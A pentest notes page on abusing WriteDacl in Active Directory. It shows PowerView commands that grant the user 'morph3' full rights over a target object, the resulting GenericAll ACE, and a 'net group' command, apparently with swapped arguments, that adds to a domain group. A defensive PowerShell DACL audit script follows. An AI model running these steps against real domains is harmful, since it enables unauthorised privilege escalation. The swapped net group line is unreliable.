WriteDacl

With WriteDacl over an object you can add new ACEs to its DACL, for example granting your own principal full rights:

PS C:\Users> Add-DomainObjectAcl -PrincipalIdentity "morph3" -TargetIdentity "TARGETOBJECT" -Rights All

PS C:\Users> Get-ObjectAcl -Identity "TARGETOBJECT" -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}

...

AceType               : AccessAllowed
ObjectDN              : <target-object>
ActiveDirectoryRights : GenericAll
OpaqueLength          : 0
...
AceFlags              : None
AceQualifier          : AccessAllowed
Identity              : ECORP\morph3

^ the ACE we just added is now present on the target object

PS C:\Users> net group "morph3" TARGETOBJECT /add /domain
The request will be processed at a domain controller for domain ECORP.LOCAL.

The command completed successfully.
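From the defender's side, the same DACL can be audited for exactly this kind of ACE. The script below is an added example, not part of the original notes or of PowerView; it assumes the RSAT ActiveDirectory module (and the AD: drive it creates) and keeps the page's TARGETOBJECT placeholder. GenericAll is a composite flag, so the check uses HasFlag rather than a bitwise AND, which would otherwise match any principal holding a single read right.

```powershell
# Added example (defensive): list ACEs on an AD object that grant GenericAll,
# WriteDacl or WriteOwner to principals other than the ones you expect.
# Assumes the ActiveDirectory RSAT module. TARGETOBJECT is a placeholder.
Import-Module ActiveDirectory

function Get-DangerousAce {
    param(
        [Parameter(Mandatory)] [string] $Identity,
        # Principals expected to hold full control; add your own admin groups
        # (e.g. 'ECORP\Domain Admins') so only unexpected grants are reported.
        [string[]] $Expected = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators')
    )

    $obj = Get-ADObject -Filter { sAMAccountName -eq $Identity } -ErrorAction Stop
    if (-not $obj) { throw "Object '$Identity' not found" }

    # Rights that let a principal take over the object outright.
    $adr = [System.DirectoryServices.ActiveDirectoryRights]
    $takeover = @($adr::GenericAll, $adr::WriteDacl, $adr::WriteOwner)

    (Get-Acl -Path "AD:\$($obj.DistinguishedName)").Access |
        Where-Object {
            $ace = $_
            $ace.AccessControlType -eq 'Allow' -and
            $ace.IdentityReference.Value -notin $Expected -and
            # HasFlag requires every bit of the flag to be set, so a principal
            # with only ReadProperty is not mistaken for GenericAll.
            ($takeover | Where-Object { $ace.ActiveDirectoryRights.HasFlag($_) })
        } |
        Select-Object @{ n = 'Object';    e = { $obj.DistinguishedName } },
                      @{ n = 'Principal'; e = { $_.IdentityReference.Value } },
                      ActiveDirectoryRights,
                      IsInherited
}

# Example run against the page's placeholder object; a freshly added
# non-inherited GenericAll entry for a regular user shows up here.
Get-DangerousAce -Identity 'TARGETOBJECT' | Format-Table -AutoSize
```

Pairing this with Directory Service Changes auditing (event ID 5136 on the domain controllers, attribute nTSecurityDescriptor) shows who wrote the new ACE and when.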


Last updated 2 years ago